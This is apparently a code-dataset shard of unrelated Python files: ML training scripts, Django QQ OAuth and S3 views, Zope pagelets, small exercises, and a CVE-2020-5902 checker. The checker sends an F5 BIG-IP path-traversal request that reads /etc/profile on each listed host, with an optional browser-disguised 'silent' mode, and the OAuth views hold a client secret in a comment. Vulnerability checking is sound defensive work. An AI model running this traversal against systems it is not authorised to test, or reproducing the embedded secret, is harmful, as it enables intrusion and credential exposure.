\"C:/Users/Administrator/Desktop/hubChem/lstm_mol/tox21/\"\r\natom_type = [ \"H\",\"C\", \"N\",\"O\",\"F\",\"P\",\"S\",\"Cl\",\"Br\",\"I\"]\r\n\r\n\r\n\r\nfiles = os.listdir (floder)\r\n\r\n\r\nfor count ,file in enumerate(files[1934:2100]):\r\n print(count ,file)\r\n with open( floder+ file,\"r\") as f:\r\n SMILES_str = f.readlines()[0]\r\n print(SMILES_str )\r\n if \".\" not in SMILES_str and \"Cu\" not in SMILES_str and \"Hg\" not in SMILES_str and \"Pt\" not in SMILES_str and \"Bi\" not in SMILES_str and \"Ir\" not in SMILES_str and \"M\" not in SMILES_str:\r\n\r\n ACD_save_mol( file,SMILES_str )\r\n #if \".\" in SMILES_str: \r\n #ACD_save_mol( file,SMILES_str )\r\n \r\n #os.remove(floder+\"0000.mol\")\r\n","sub_path":"pyauto6_tox21.py","file_name":"pyauto6_tox21.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396844713","text":"import sys\n\nimport argparse\nimport time\nimport pickle as pkl\nimport functools\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn.utils import clip_grad_norm\nfrom 
torch.utils.data import TensorDataset, DataLoader\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss\n\nfrom nltk.stem import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\nfrom convrnn import ConvRNNLSTMFeat\nsys.path.append('../utils/')\nfrom data import TacoText\nfrom preprocess import clean_and_tokenize, pad_and_shape\nfrom pipeline import pipeline\n\n\ndef get_glove_embeddings(file_path, corpus, ntoken, nemb):\n file_name = '/glove.6B.{}d.txt'.format(nemb)\n f = open(file_path+file_name, 'r')\n embeddings = torch.nn.init.xavier_uniform(torch.Tensor(ntoken, nemb))\n for line in f:\n split_line = line.split()\n word = split_line[0]\n if word in corpus:\n embedding = torch.Tensor([float(val) for val in split_line[1:]])\n embeddings[corpus[word]] = embedding\n return embeddings\n\n\ndef evaluate(model, data_loader, cuda, d_in, n_feat):\n correct, total = 0, 0\n pred_list = []\n true_list = []\n for ind, (qs, duplicate) in enumerate(data_loader):\n out = model(qs[:, 0, 0, :d_in].long(), qs[:, 0, 1, :d_in].long(), qs[:, 0, 2, :n_feat])\n pred = out.data.max(1)[1]\n if cuda:\n pred = pred.cuda()\n duplicate = duplicate.cuda()\n correct += (pred == duplicate).sum()\n total += len(pred)\n pred_list += list(out.exp()[:, 1].data.cpu().numpy())\n true_list += list(duplicate.cpu().numpy())\n return (correct / total), log_loss(true_list, pred_list, eps=1e-7)\n\n\ndef feature_gen(x):\n f = []\n f.append(abs(len(x[0]) - len(x[1]))) #WCDifference\n wic = len(set(x[0]).intersection(set(x[1])))\n f.append(wic) #NumWordsInCommon\n uw = len(set(x[0]).union(set(x[1])))\n f.append(uw) #Num unique words\n f.append(wic/uw) #Jaccard\n f.append(f[3]/len(set(x[0]))) #Pct Overlap Q1\n f.append(int((f[3]/len(set(x[0]))) < 0.1))\n f.append(int((f[3]/len(set(x[0]))) < 0.2))\n f.append(int((f[3]/len(set(x[0]))) < 0.3))\n f.append(int((f[3]/len(set(x[0]))) < 0.4))\n f.append(int((f[3]/len(set(x[0]))) < 0.5))\n f.append(f[3]/len(set(x[1]))) #Pct Overlap Q2\n f.append(int((f[3]/len(set(x[1]))) < 0.1))\n f.append(int((f[3]/len(set(x[1]))) < 0.2))\n f.append(int((f[3]/len(set(x[1]))) < 0.3))\n f.append(int((f[3]/len(set(x[1]))) < 0.4))\n f.append(int((f[3]/len(set(x[1]))) < 0.5))\n f.append(int((wic/uw) < 0.1))\n f.append(int((wic/uw) < 0.2))\n f.append(int((wic/uw) < 0.3))\n f.append(int((wic/uw) < 0.4))\n f.append(int((wic/uw) < 0.5))\n f.append(int(x[0][0].lower() == x[1][0].lower()))\n# for q in ('who','what','when','where','why','how','which'):\n# f.append(int(x[0][0].lower() == q))\n# f.append(int(x[1][0].lower() == q))\n return f\n\n\ndef main():\n parser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')\n parser.add_argument('--data', type=str, default='../data/',\n help='location of the data corpus')\n parser.add_argument('--presaved', action='store_true',\n help='use presaved data')\n parser.add_argument('--glovedata', type=str, default='../data/glove.6B',\n help='location of the pretrained glove embeddings')\n parser.add_argument('--din', type=int, default=30,\n help='length of LSTM')\n parser.add_argument('--demb', type=int, default=300,\n help='size of word embeddings')\n parser.add_argument('--dhid', type=int, default=300,\n help='number of hidden units per layer')\n parser.add_argument('--dlin', type=int, default=500,\n help='number linear transformation nodes')\n parser.add_argument('--dout', type=int, default=2,\n help='number of output classes')\n parser.add_argument('--nlayers', type=int, default=1,\n help='number of 
layers')\n parser.add_argument('--lr', type=float, default=0.001,\n help='initial learning rate')\n parser.add_argument('--wd', type=float, default=0.0,\n help='adam l2 weight decay')\n parser.add_argument('--clip', type=float, default=0.25,\n help='gradient clipping')\n parser.add_argument('--embinit', type=str, default='random',\n help='embedding weight initialization type')\n parser.add_argument('--decinit', type=str, default='random',\n help='decoder weight initialization type')\n parser.add_argument('--hidinit', type=str, default='random',\n help='recurrent hidden weight initialization type')\n parser.add_argument('--dropout', type=float, default=0.0,\n help='dropout applied to layers (0 = no dropout)')\n parser.add_argument('--rnn', type=str, default='lstm',\n help='lstm or gru')\n parser.add_argument('--epochs', type=int, default=40,\n help='upper epoch limit')\n parser.add_argument('--batchsize', type=int, default=20, metavar='N',\n help='batch size')\n parser.add_argument('--seed', type=int, default=3,\n help='random seed')\n parser.add_argument('--vocabsize', type=int, default=200000,\n help='random seed')\n parser.add_argument('--optimizer', action='store_true',\n help='use ADAM optimizer')\n parser.add_argument('--pipeline', action='store_true',\n help='use pipeline file')\n parser.add_argument('--psw', type=int, default=1,\n help='remove stop words')\n parser.add_argument('--ppunc', action='store_true',\n help='remove punctuation')\n parser.add_argument('--pntok', action='store_true',\n help='use number tokens')\n parser.add_argument('--pkq', action='store_true',\n help='keep question words')\n parser.add_argument('--stem', action='store_true',\n help='use stemmer')\n parser.add_argument('--lemma', action='store_true',\n help='use lemmatizer')\n parser.add_argument('--bidir', action='store_false',\n help='bidirectional')\n parser.add_argument('--freezeemb', action='store_false',\n help='freezes embeddings')\n parser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n parser.add_argument('--loginterval', type=int, default=100, metavar='N',\n help='report interval')\n parser.add_argument('--save', type=str, default='',\n help='path to save the final model')\n args = parser.parse_args()\n\n \n\n if not args.presaved:\n pipe = None\n if args.pipeline:\n stemmer, lemmatizer = None, None\n if args.stem:\n stemmer = SnowballStemmer('english')\n elif args.lemma:\n lemmatizer = WordNetLemmatizer()\n\n pipe = functools.partial(pipeline, \n rm_stop_words=args.psw, \n rm_punc=args.ppunc, \n number_token=args.pntok, \n keep_questions=args.pkq,\n stemmer=stemmer,\n lemmatizer=lemmatizer)\n\n corpus = TacoText(args.vocabsize, lower=True, vocab_pipe=pipe)\n print('Loading Data')\n # train_data = pd.read_csv(args.data)\n #Shuffle order of training data\n\n train_data = pd.read_csv('../data/train_data_shuffle.csv')\n val_data = pd.read_csv('../data/val_data_shuffle.csv')\n\n train_data = train_data.iloc[:1000]\n val_data = val_data.iloc[:1000]\n\n print('Cleaning and Tokenizing')\n q1, q2, y = clean_and_tokenize(train_data, corpus)\n q1_val, q2_val, y_val = clean_and_tokenize(val_data, corpus)\n\n train_feat = list(map(feature_gen, zip(q1, q2)))\n val_feat = list(map(feature_gen, zip(q1_val, q2_val)))\n scalar = preprocessing.StandardScaler()\n train_feat = scalar.fit_transform(train_feat)\n val_feat = scalar.transform(val_feat)\n\n print('Piping Data')\n q1 = corpus.pipe_data(q1)\n q2 = corpus.pipe_data(q2)\n q1_val = corpus.pipe_data(q1_val)\n q2_val = 
corpus.pipe_data(q2_val)\n\n corpus.gen_vocab(q1 + q2 + q2_val + q1_val)\n\n n_feat = train_feat.shape[1]\n d_in = args.din\n feat_max = int(np.max([n_feat, d_in]))\n\n X = torch.Tensor(len(train_data), 1, 3, feat_max)\n X[:, 0, 0, :] = torch.from_numpy(corpus.pad_numericalize(q1, feat_max)).long()\n X[:, 0, 1, :] = torch.from_numpy(corpus.pad_numericalize(q2, feat_max)).long()\n X[:, 0, 2, :n_feat] = torch.from_numpy(np.array(train_feat))\n y = torch.from_numpy(np.array(y)).long()\n\n X_val = torch.Tensor(len(val_data), 1, 3, feat_max)\n X_val[:, 0, 0, :] = torch.from_numpy(corpus.pad_numericalize(q1_val, feat_max)).long()\n X_val[:, 0, 1, :] = torch.from_numpy(corpus.pad_numericalize(q2_val, feat_max)).long()\n X_val[:, 0, 2, :n_feat] = torch.from_numpy(np.array(val_feat))\n y_val = torch.from_numpy(np.array(y_val)).long()\n\n torch.save(X, '../data/X_feat.t')\n torch.save(y, '../data/y_feat.t')\n torch.save(X_val, '../data/X_val_feat.t')\n torch.save(y_val, '../data/y_val_feat.t')\n with open(args.save + '_corpus_feat.pkl', 'wb') as corp_f:\n pkl.dump(corpus, corp_f, protocol=pkl.HIGHEST_PROTOCOL)\n\n else:\n n_feat = 22\n d_in = args.din\n print('Loading Presaved Data')\n X = torch.load(args.data + 'X_feat.t')\n y = torch.load(args.data + 'y_feat.t')\n X_val = torch.load(args.data + 'X_val_feat.t')\n y_val = torch.load(args.data + 'y_val_feat.t')\n with open('../data/corpus_feat.pkl', 'rb') as f:\n corpus = pkl.load(f)\n\n\n if args.cuda:\n X, y = X.cuda(), y.cuda()\n X_val, y_val = X_val.cuda(), y_val.cuda()\n\n print('Generating Data Loaders')\n #X.size len(train_data),1,2,fix_length\n train_dataset = TensorDataset(X, y)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batchsize, \n shuffle=True)\n valid_loader = DataLoader(TensorDataset(X_val, y_val),\n batch_size=args.batchsize,\n shuffle=False)\n\n ntokens = len(corpus)\n glove_embeddings = None\n if args.embinit == 'glove':\n assert args.demb in (50, 100, 200, 300)\n glove_embeddings = get_glove_embeddings(args.glovedata, corpus.dictionary.word2idx, ntokens, args.demb)\n\n model = ConvRNNLSTMFeat(args.din, args.dhid, args.dout, args.demb, args.dlin, args.vocabsize, \n args.dropout, args.embinit, args.hidinit, args.decinit, \n glove_embeddings, args.cuda, args.rnn, args.bidir, n_feat)\n\n if args.cuda:\n model.cuda()\n\n criterion = nn.NLLLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n model_config = '\\t'.join([str(x) for x in (torch.__version__, args.rnn, args.bidir, args.clip, args.nlayers, args.din, args.demb, args.dhid, args.dlin,\n args.embinit, args.decinit, args.hidinit, args.dropout, args.optimizer, args.lr, args.wd, args.vocabsize,\n args.pipeline, args.psw, args.ppunc, args.pntok, args.pkq, args.stem, args.lemma)])\n\n print('Pytorch | RNN | BiDir | Clip | #Layers | InSize | EmbDim | HiddenDim | LinearDim | EncoderInit | DecoderInit | WeightInit | Dropout | Optimizer| LR | WeightDecay | VocabSize | pipeline | stop | punc | ntoken | keep_ques | stem | lemma')\n print(model_config)\n\n # best_val_acc = 0.78\n best_ll = 0.5\n for epoch in range(args.epochs):\n model.train()\n total_cost = 0\n start_time = time.time()\n cur_loss = 0\n for ind, (qs, duplicate) in enumerate(train_loader):\n model.zero_grad()\n pred = model(qs[:, 0, 0, :d_in].long(), qs[:, 0, 1, :d_in].long(), qs[:, 0, 2, :n_feat])\n if args.cuda:\n pred = pred.cuda()\n duplicate = duplicate.cuda()\n duplicate = Variable(duplicate)\n loss = criterion(pred, duplicate)\n loss.backward()\n 
clip_grad_norm(model.parameters(), args.clip)\n\n if optimizer:\n optimizer.step()\n else:\n for p in model.parameters():\n p.data.add_(-args.lr, p.grad.data)\n\n total_cost += loss.data[0]\n cur_loss += loss.data[0]\n\n if ind % args.loginterval == 0 and ind > 0:\n cur_loss = loss.data[0] / args.loginterval\n elapsed = time.time() - start_time\n print('| Epoch {:3d} | {:5d}/{:5d} Batches | ms/batch {:5.2f} | '\n 'Loss {:.6f}'.format(\n epoch, ind, len(X) // args.batchsize,\n elapsed * 1000.0 / args.loginterval, cur_loss))\n start_time = time.time()\n cur_loss = 0\n\n model.eval()\n train_acc, train_ll = evaluate(model, train_loader, args.cuda, d_in, n_feat)\n val_acc, val_ll = evaluate(model, valid_loader, args.cuda, d_in, n_feat)\n # if args.save and (val_acc > best_val_acc):\n if args.save and (val_ll < best_ll):\n with open(args.save + '_corpus.pkl', 'wb') as corp_f:\n pkl.dump(corpus, corp_f, protocol=pkl.HIGHEST_PROTOCOL)\n torch.save(model.cpu(), args.save)\n torch.save(model.cpu().state_dict(), args.save + \".state_dict\")\n with open(args.save + \".state_dict.config\", \"w\") as f:\n f.write(model_config)\n best_ll = val_ll\n if args.cuda:\n model.cuda()\n\n\n print('Epoch: {} | Train Loss: {:.4f} | Train Accuracy: {:.4f} | Val Accuracy: {:.4f} | Train LL: {:.4f} | Val LL: {:.4f}'.format(\n epoch, total_cost, train_acc, val_acc, train_ll, val_ll))\n print('-' * 89)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"models/convrnnLSTM_main_feat.py","file_name":"convrnnLSTM_main_feat.py","file_ext":"py","file_size_in_byte":14636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168681181","text":"from django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom QQLoginTool.QQtool import OAuthQQ\nfrom rest_framework.response import Response\nfrom django.conf import settings\nfrom rest_framework import status\nfrom rest_framework_jwt.settings import api_settings\nimport logging\n\nfrom .models import OAuthQQUser\nfrom .utils import generate_save_user_token\nfrom .serializers import QQAuthUserSerializer\n\nlogger = logging.getLogger('django')\n\n\n# Create your views here.\nclass QQOauthURLView(APIView):\n \"\"\" 拼接好QQ登录地址 \"\"\"\n\n def get(self, request):\n # 1. 提取前端传入的next参数,记录用户从哪里去到的login界面\n # get(self, key, default_None), 获取key指定的值,如果获取的key不存在,返回default参数的值\n next = request.query_params.get('next', '/')\n # # QQ登录参数\n # QQ_CLIENT_ID = '101514053'\n # QQ_CLIENT_SECRET = '1075e75648566262ea35afa688073012'\n # QQ_REDIRECT_URI = 'http://www.meiduo.site:8080/oauth_callback.html'\n\n # 2.利用QQ登录SDK\n # oauth = OAuthQQ(client_id=appid, client_secret=appkey, redirect_uri=回调域名, state=记录来源)\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET,\n redirect_url=settings.QQ_REDIRECT_URL, state=next)\n login_url = oauth.get_qq_url()\n # 调用里面的方法,拼接QQ登录网址\n return Response({'login_url': login_url})\n\n\nclass QQOauthUserView(APIView):\n \"\"\" QQ登录成功后的回调处理 \"\"\"\n\n def get(self, request):\n # 1. 获取前端传入的code\n code = request.query_params.get('code')\n if not code:\n return Response({'message': '缺少code'}, status=status.HTTP_400_BAD_REQUEST)\n # 2. 
Create the QQ OAuth tool object\n        oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET,\n                        redirect_url=settings.QQ_REDIRECT_URL)\n\n        try:\n            # 3. Call get_access_token(code) to exchange the code for an access_token from the QQ server\n            access_token = oauth.get_access_token(code)\n            # 4. Call oauth.get_open_id(access_token) to fetch the openid from the QQ server\n            openid = oauth.get_open_id(access_token)\n        except Exception as e:\n            logger.info(e)\n            return Response({'message': 'QQ server error'}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n        try:\n            # 5. Check whether this openid already exists in the database\n            authQQUserModel = OAuthQQUser.objects.get(openid=openid)\n        except OAuthQQUser.DoesNotExist:\n            # 6. If the openid is not bound to a user, sign the openid and return it for the front end to hold until binding\n            access_token_openid = generate_save_user_token(openid)\n            return Response({'access_token': access_token_openid})\n\n        else:\n            # 7. If the openid is already bound to a Meiduo user, login succeeds; return a JWT to the front end to keep login state\n            user = authQQUserModel.user  # get the user associated with this openid\n            jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER  # reference to jwt's jwt_payload_handler function (builds the payload)\n            jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER  # function reference that encodes the jwt\n\n            payload = jwt_payload_handler(user)  # build the payload for this user\n            token = jwt_encode_handler(payload)  # encode the payload into a complete jwt\n\n            return Response({\n                'token': token,\n                'username': user.username,\n                'user_id': user.id\n            })\n\n    def post(self, request):\n        """ Bind the openid to a user """\n\n        # 1. Create the serializer for deserialization\n        serializer = QQAuthUserSerializer(data=request.data)\n\n        # Call is_valid to validate\n        serializer.is_valid(raise_exception=True)\n\n        # Call the serializer's save method to persist\n        user = serializer.save()\n\n        # Generate a JWT to keep login state\n        jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n        jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n        payload = jwt_payload_handler(user)  # build the payload for this user\n        token = jwt_encode_handler(payload)  # encode the payload into a complete jwt\n\n        return Response(\n            {\n                'token': token,\n                'username': user.username,\n                'user_id': user.id,\n            }\n        )\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130445379","text":"rhyme = ["Mary", "had", "a", "little", "lamb", "whose", "fleece", "was", "white", "as", "snow"]\r\n\r\ndef wlcount(L):\r\n\tprint(len(rhyme)) #This prints the length of the list (number of words)\r\n\tsum = 0\r\n\tfor i in range(11): #This is to print the number of letters.\r\n\t\tsum = sum + len(rhyme[i])\r\n\t\tprint (rhyme[i], len(rhyme[i]))\r\n\treturn sum\r\n\r\nprint(wlcount(rhyme))\r\n\r\n\t","sub_path":"poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336030506","text":"import os\nimport csv\n\n#function for increase\ndef getIncrease(curr,prev):\n    increase = curr - prev\n    return increase\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\nmonthCount = 0\ngIncrease = 0\ngDec = 0\nchange = 0\ncurrentIncrease = 0\ncurrentMonth = 0\nprevMonth = 0\ntotal = 0\n\nwith open(csvpath, newline='') as csvfile:\n\n    # CSV reader specifies delimiter and variable that holds contents\n    csvreader = csv.reader(csvfile, delimiter=',')\n\n    # Read the header row first (skip this step if there is no header)\n    csv_header = next(csvreader)\n\n    # Read each row of data after the header\n    for row in csvreader:\n        monthCount += 1\n        total = total + float(row[1])\n\n        if(monthCount != 0):\n            currentMonth = float(row[1])\n            change = getIncrease(currentMonth,prevMonth)\n\n            
currentIncrease = currentIncrease + change\n prevMonth=currentMonth \n else:\n # currentIncrease+= float(row[1])\n prevMonth=float(row[1])\n\n #check for greatest increase and greatest decrease in profits\n if(change >= 0 and change > gIncrease):\n gIncrease= change\n gMonth = row[0]\n elif(change<0 and change < gDec):\n gDec = change\n iMonth = row[0]\n \n averIncrease=currentIncrease/(monthCount - 1)\n # print(1170593 - -755566)\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {monthCount}\")\nprint(f\"Total: ${int(total)}\")\nprint(f\"Average Change: ${round(averIncrease,2)}\")\nprint(f\"Greatest Increase in Profits: {gMonth} ({int(gIncrease)})\")\nprint(f\"Greatest Decrease in Profits: {iMonth} ({int(gDec)})\")\n\nf=open(\"financial_analysis.txt\", 'w')\nf.write(\"Financial Analysis \\n\")\nf.write(\"----------------------------\\n\")\nf.write(f\"Total Months: {monthCount}\\n\")\nf.write(f\"Total: ${int(total)}\\n\")\nf.write(f\"Average Change: ${round(averIncrease,2)}\\n\")\nf.write(f\"Greatest Increase in Profits: {gMonth} ({int(gIncrease)})\\n\")\nf.write(f\"Greatest Decrease in Profits: {iMonth} ({int(gDec)})\")\nf.close()","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539568825","text":"##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\n$Id: __init__.py 97 2007-03-29 22:58:27Z rineichen $\n\"\"\"\n\nimport zope.component\nfrom zope.app.exception.systemerror import SystemErrorView\nfrom zope.app.exception.browser.unauthorized import Unauthorized\nfrom zope.app.exception.browser.user import UserErrorView\nfrom zope.app.exception.browser.notfound import NotFound\nfrom zope.app.security.interfaces import IAuthentication\nfrom z3c.template.interfaces import IContentTemplate\nfrom z3c.pagelet import browser\n\n\nclass SystemErrorPagelet(browser.BrowserPagelet, SystemErrorView):\n \"\"\"SystemError pagelet.\"\"\"\n\n\nclass UnauthorizedPagelet(browser.BrowserPagelet, Unauthorized):\n \"\"\"Unauthorized pagelet.\"\"\"\n\n def render(self):\n # Set the error status to 403 (Forbidden) in the case when we don't\n # challenge the user\n self.request.response.setStatus(403)\n\n # make sure that squid does not keep the response in the cache\n self.request.response.setHeader(\n 'Expires', 'Mon, 26 Jul 1997 05:00:00 GMT')\n self.request.response.setHeader(\n 'Cache-Control', 'no-store, no-cache, must-revalidate')\n self.request.response.setHeader('Pragma', 'no-cache')\n\n principal = self.request.principal\n auth = zope.component.getUtility(IAuthentication)\n auth.unauthorized(principal.id, self.request)\n if self.request.response.getStatus() not in (302, 303):\n template = zope.component.getMultiAdapter((self, self.request),\n IContentTemplate)\n return template(self)\n\n\nclass 
UserErrorPagelet(browser.BrowserPagelet, UserErrorView):\n \"\"\"UserError pagelet.\"\"\"\n\n\nclass NotFoundPagelet(browser.BrowserPagelet, NotFound):\n \"\"\"NotFound pagelet.\"\"\"\n\n def render(self):\n self.request.response.setStatus(404)\n template = zope.component.getMultiAdapter((self, self.request),\n IContentTemplate)\n return template(self)\n","sub_path":"z3c.layer.pagelet/tags/1.1.0/src/z3c/layer/pagelet/browser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590905382","text":"import logging\n\nfrom botocore.exceptions import ClientError\nfrom botocore.client import Config\nfrom flask import abort\nfrom flask import Blueprint, render_template\nfrom jinja2 import TemplateNotFound\n\nimport boto3\n\ns3_form = Blueprint('s3_form', __name__)\n\nBUCKET_NAME = 'plomza-bucket'\nOBJECT_NAME = '${filename}'\nREGION_NAME = 'eu-central-1'\n\nconfig = Config(signature_version='s3v4', region_name=REGION_NAME)\n\nsession = boto3.session.Session()\n\n\ndef create_presigned_url(bucket_name, object_name, expiration=3600):\n s3_client = boto3.client('s3', config=config)\n try:\n response = s3_client.generate_presigned_url('get_object', Params={'Bucket': bucket_name, 'Key': object_name},\n ExpiresIn=expiration)\n except ClientError as e:\n logging.error(e)\n return None\n return response\n\n\ndef create_presigned_post(bucket_name, object_name,\n fields=None, conditions=None, expiration=3600):\n \"\"\"Generate a presigned URL S3 POST request to upload a file\n\n :param bucket_name: string\n :param object_name: string\n :param fields: Dictionary of prefilled form fields\n :param conditions: List of conditions to include in the policy\n :param expiration: Time in seconds for the presigned URL to remain valid\n :return: Dictionary with the following keys:\n url: URL to post to\n fields: Dictionary of form fields and values to submit with the POST\n :return: None if error.\n \"\"\"\n\n # Generate a presigned S3 POST URL\n s3_client = boto3.client('s3', config=config)\n try:\n response = s3_client.generate_presigned_post(bucket_name,\n object_name,\n Fields=fields,\n Conditions=conditions,\n ExpiresIn=expiration)\n except ClientError as e:\n logging.error(e)\n return None\n\n # The response contains the presigned URL and required fields\n return response\n\n\n@s3_form.route('/s3', methods=['POST', 'GET'])\ndef form():\n try:\n presigned_response = create_presigned_post(bucket_name=BUCKET_NAME, object_name=OBJECT_NAME)\n\n return render_template('s3_form.html', response=presigned_response)\n except TemplateNotFound:\n abort(404)\n\n\n@s3_form.route('/s3/files')\ndef get_objects():\n resource = session.resource('s3')\n my_bucket = resource.Bucket(BUCKET_NAME)\n objects = my_bucket.objects.all()\n data = [(obj.key, create_presigned_url(BUCKET_NAME, obj.key)) for obj in objects]\n\n return render_template('files.html', data=data)\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326085103","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom pytest import raises\nfrom cottonformation.core.model import Tag, Parameter, constant\n\n\nclass TestTag:\n def test_init(self):\n with raises(TypeError):\n Tag()\n\n with raises(TypeError):\n Tag(1, 2)\n\n with raises(TypeError):\n Tag(\"k\", 1)\n\n with raises(ValueError):\n 
Tag(p_Key=\"key\" * 100, p_Value=\"value\")\n\n with raises(ValueError):\n Tag(p_Key=\"key\", p_Value=\"value\" * 100)\n\n\n tags = Tag.make_many(dict_data=dict(name=\"ctf\", stage=\"dev\"), creator=\"alice@example.com\")\n assert tags[0].p_Key == \"name\"\n assert tags[1].p_Key == \"stage\"\n assert tags[2].p_Key == \"creator\"\n\n def test_serialize(self):\n assert Tag(\"Name\", \"Alice\").serialize() == {\"Key\": \"Name\", \"Value\": \"Alice\"}\n p = Parameter(\"Name\", Type=Parameter.TypeEnum.String)\n assert Tag(\"Name\", p.ref()).serialize() == {\n \"Key\": \"Name\",\n \"Value\": {constant.IntrinsicFunction.REF: \"Name\"}\n }\n\n\nif __name__ == \"__main__\":\n import os\n\n basename = os.path.basename(__file__)\n pytest.main([basename, \"-s\", \"--tb=native\"])\n","sub_path":"tests/core/test_tag.py","file_name":"test_tag.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166497562","text":"from termcolor import colored\r\nimport requests\r\nimport argparse\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\nmy_parser = argparse.ArgumentParser(description='Checker for CVE-2020-5902', epilog='Only for defensive purpouses')\r\nmy_parser.add_argument('mode',\r\n metavar='mode',\r\n type=str,\r\n help='Silent or signed User-Agent',\r\n choices=['silent', 'signed'],\r\n default='signed')\r\n\r\nmy_parser.add_argument('list',\r\n metavar='list',\r\n type=str,\r\n help='List with targets. ip:port. 1 per line',\r\n )\r\n\r\nmy_parser.add_argument('timeout',\r\n metavar='timeout',\r\n type=int,\r\n help='Timeout for requests (in seconds)',\r\n )\r\n\r\nargs = my_parser.parse_args()\r\nmode = args.mode\r\nlista = args.list\r\ntiempo = args.timeout\r\n\r\n\r\nif mode == 'signed':\r\n\tua = 'CVE-2020-5902 Checker. It reads profile from etc'\r\nelse:\r\n\tua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'\r\n\r\nheaders = {\r\n\t'User-Agent':ua\r\n}\r\n\r\nf = open(lista, 'r')\r\nlineas = f.readlines()\r\nf.close()\r\nv = 0\r\nprint(colored('[?] Targets loaded: ' + str(len(lineas)), 'blue'))\r\n\r\ndef check(host, port):\r\n target = 'https://' + host + ':' + str(port) + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/profile'\r\n #print(target)\r\n r = requests.get(target, headers=headers, verify=False, timeout=tiempo)\r\n if r.text.find('System wide environment and startup programs') != -1:\r\n print(colored('[-] ' + host + ':' + str(port) + ' is vulnerable to CVE-2020-5902', 'red'))\r\n print(colored('[?] Patch with K52145254', 'yellow'))\r\n global v\r\n v = v + 1\r\n else:\r\n print(colored('[+] ' + host + ':' + str(port) + ' is patched', 'green'))\r\n\r\nfor linea in lineas:\r\n linea.encode(\"utf-8\")\r\n linea = linea.split(':')\r\n host = linea[0]\r\n port = linea[1].replace('\\n','')\r\n check(host, port)\r\n\r\nprint(colored('[?] ' + colored(str(v),'red') + ' targets are vulnerable. ' + colored(str(round(v * 100 / len(lineas))) + '%', 'red'), 'blue'))\r\nprint(colored('[?] 
More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow'))","sub_path":"Real World/Others/CVE-2020-5902/CVE-2020-5902.py","file_name":"CVE-2020-5902.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519876935","text":"import pygame, sys\nfrom pygame.locals import *\nfrom Level import *\n\nclass Scene():\n def __init__(self, s):\n self.screen = s\n \n self.clock = pygame.time.Clock()\n \n self.tiles = pygame.sprite.Group()\n self.water = pygame.sprite.Group()\n self.walls = pygame.sprite.Group()\n self.trees = pygame.sprite.Group()\n self.items = pygame.sprite.Group()\n self.tools = pygame.sprite.Group()\n self.bullets = pygame.sprite.Group()\n self.sprites = pygame.sprite.Group()\n self.player_group = pygame.sprite.Group()\n \n\nclass TextScreen():\n def __init__(self, s, text, color):\n self.screen = s\n self.text = text\n self.color = color\n \n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n \n if event.type == KEYDOWN:\n if event.key in [K_ESCAPE, K_RETURN]:\n return\n \n self.screen.fill(self.color)\n font = 